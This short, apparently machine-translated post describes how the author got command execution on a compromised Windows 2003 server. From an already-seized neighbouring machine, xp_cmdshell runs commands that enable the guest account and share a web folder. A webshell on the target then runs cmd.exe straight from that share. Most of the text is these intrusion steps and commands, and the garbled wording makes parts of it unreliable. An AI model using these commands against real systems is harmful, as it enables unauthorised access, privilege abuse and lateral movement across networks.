Recently in the invasion of Win2003 when found default case not use the system comes with the cmd. exe files to execute system commands, upload the cmd. exe file because the file is too big to fail, then I pass a station adjacent to the machine's file share successfully upload the cmd. exe file, the specific process is as follows: We have acquired the adjacent machine 192.168.1.1-administrator privileges, use SQL's xp_cmdshell command executes the following operations: net user guest /active:yes open the guest user to allow file sharing anonymous access net share the web=d:\the web the WEB directory sharing
Then in the target machine on the WEBSHELL on the following input: \\192.168.1.1\web\cmd.exe
Finally, on the figure of the SHELL path to c:\in cmd. exe to the normal operating system commands.